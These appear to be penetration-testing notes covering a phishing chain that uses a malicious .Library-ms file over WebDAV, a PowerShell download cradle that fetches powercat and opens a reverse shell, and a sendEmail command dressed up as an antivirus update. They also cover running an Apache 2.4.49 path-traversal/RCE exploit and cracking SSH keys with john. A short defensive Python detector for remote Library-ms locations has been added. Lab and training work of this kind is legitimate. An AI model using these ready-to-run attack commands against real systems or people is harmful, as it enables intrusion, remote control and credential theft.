Exploitation

Malicious Shortcut via Powercat

Create a shortcut on the desktop. Host on WebDAV:

/home/c4/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/c4/pwnshare/tools

Create the config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://IP</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Create the shortcut on Windows:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://IP/powercat.ps1');
powercat -c IP -p 4444 -e powershell"

Sending Malicious Email

-a Attach
-xu Executing User
-xp Password
-f FROM
-t TO
-u SUBJECT
-m BODY
sendEmail -t user@email.com -f c4@malicious.com -u ATTENTION: Antivirus Update -a /home/c4/pwnshare/tools/config.Library-ms -s IP -m "double click file to update antivirus" -xu admin@mail.com -xp P@55w0rd
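
Defensive check for the attachment used above, as an added example that is not part of the original notes: a mail-gateway or triage script can parse a .Library-ms file and flag any simpleLocation that points at an HTTP(S) WebDAV server or a UNC path. The function names and the sample inputs are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

def remote_locations(data: bytes) -> list[str]:
    """Return the simpleLocation URLs in a .Library-ms file that leave the host."""
    if b"<!DOCTYPE" in data.upper():
        # Library files carry no DTD; refuse it rather than expand entities.
        raise ValueError("unexpected DOCTYPE in library file")
    root = ET.fromstring(data)
    hits = []
    for url in root.iterfind(".//lib:simpleLocation/lib:url", NS):
        value = (url.text or "").strip()
        scheme = urlparse(value).scheme.lower()
        # http/https is a WebDAV location; a leading \\ is an SMB/UNC path.
        if scheme in ("http", "https") or value.startswith("\\\\"):
            hits.append(value)
    return hits

def flag_attachment(filename: str, data: bytes) -> bool:
    """True when an attachment is a library file that points at a remote share."""
    return filename.lower().endswith(".library-ms") and bool(remote_locations(data))

def _library(url: str) -> bytes:
    # Constructed sample input: minimal library file with one location.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
        "<searchConnectorDescriptionList><searchConnectorDescription>"
        f"<simpleLocation><url>{url}</url></simpleLocation>"
        "</searchConnectorDescription></searchConnectorDescriptionList>"
        "</libraryDescription>"
    ).encode()

REMOTE = _library("http://192.0.2.10")  # constructed, TEST-NET-1 address
LOCAL = _library("knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")  # constructed

if __name__ == "__main__":
    for name, blob in (("config.Library-ms", REMOTE), ("Documents.library-ms", LOCAL)):
        print(name, flag_attachment(name, blob), remote_locations(blob))
```

Library files that reference only local known folders pass; any file with a remote location is worth quarantining, since the format is rarely sent by e-mail.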

Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)

cp ~/pwnshare/tools/50382.sh .
chmod +x 50382.sh

Set up targets.txt.

Example:

./50382.sh 245 /etc/passwd 

SSH Key Cracking

Prep the hash for john:

ssh2john id_ecdsa > id_ecdsa.hash

Use the password list:

john --wordlist=passwords.txt id_ecdsa.hash